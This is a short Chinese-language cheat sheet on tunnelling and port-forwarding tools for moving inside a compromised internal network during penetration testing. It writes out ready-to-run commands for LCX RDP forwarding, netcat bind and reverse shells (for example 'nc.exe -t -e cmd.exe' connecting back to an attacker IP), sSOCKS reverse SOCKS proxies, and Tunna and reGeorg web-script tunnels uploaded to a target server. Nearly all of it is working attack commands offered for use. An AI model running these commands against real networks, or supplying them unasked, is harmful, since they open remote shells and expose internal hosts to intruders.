内网渗透中转发工具总结
LCX转发
内网机器上执行:lcx.exe –slave 公网IP +端口 内网IP +端口
lcx.exe -slave 192.168.43.142 51 192.168.43.137 3389
将内网(192.168.43.137)的3389端口转发到公网(192.168.43.142)的51端口
然后在公网的机器上执行:
Lcx.exe –listen 51 3389
监听51端口,转发到公网机器的3389端口。
这个时候已经将内网的3389转发到了公网机器的3389端口,我们在本地机器上远程公网IP+3389 ,就连接上了内网机器的3389。
nc反弹shell
正向连接:
在远程机器(目标机器)上执行:
nc.exe -l -p 8888 -t -e cmd.exe
在本地机器(攻击机器)上执行:
nc.exe -nvv 192.168.74.134 8888
反向连接:
在本地机器(攻击机器)上执行:
nc -l -p 8888
在远程机器(目标机器)上执行:
nc.exe -t -e cmd.exe 192.168.74.1 8888
成功之后,我们在本地机器上看一下,已经获得了远程机器的cmdshell.
sSOCKS
一个socks代理工具套装,可用来开启socks代理服务,支持socks5验证,支持IPV6和UDP,并提供反向socks代理服务,即将远程计算机作为socks代理服务端,反弹回本地,极大方便内网的渗透测试。
先在vps 执行
rcsocks –l 1088 –p 8888 –vv
, 监听1088端口。内网机器执行
./rssocks –vv –s 192.168.30.103:8888(VPS)
成功,则会看到会话建立.
设置代理,让本机可以通过VPS的1088端口访问内网机器。
本机上 ssh 192.168.43.136内网主机.
Tunna 正向代理
将conn脚本上传到目标服务器,然后执行
python proxy.py -u http://192.168.74.132:8080/conn.jsp -l 8888 -r 8080 -v -s
然后访问http://127.0.0.1:8888/,可以看到内网机器的8080端口被转发到本机的8888端口。(也可以把22端口转发出来)
同样的,如果内网的机器是windows,就把3389转出来
proxy.py -u http://xxx.com:206/test /conn.jsp -l 8888 -r 3389 -v
其中几个参数的解释:
-l 表示本地监听的端口 -r 远程要转发的端口 -v 详细模式
另外,如果脚本传到了内网A机器上,但是想登录内网B机器,那么可以-a参数指定机器
将内网中172.16.100.20主机的3389转发到本地
python2.7 proxy.py -u http://219.x.x.x/conn.jsp -l 1234 -a 172.16.100.20 -r 3389
reGeorg+proxifier 正向代理
先将reGeorg的对应脚本上传到服务器端,直接访问显示“Georg says, ‘All seems fine’”,表示脚本运行正常.
运行
python reGeorgSocksProxy.py -p 8888 -u http://192.168.74.132:8080/tunnel.jsp
将proxifier打开,在Proxy Server中配置,然后就可以在本地访问内网的机器了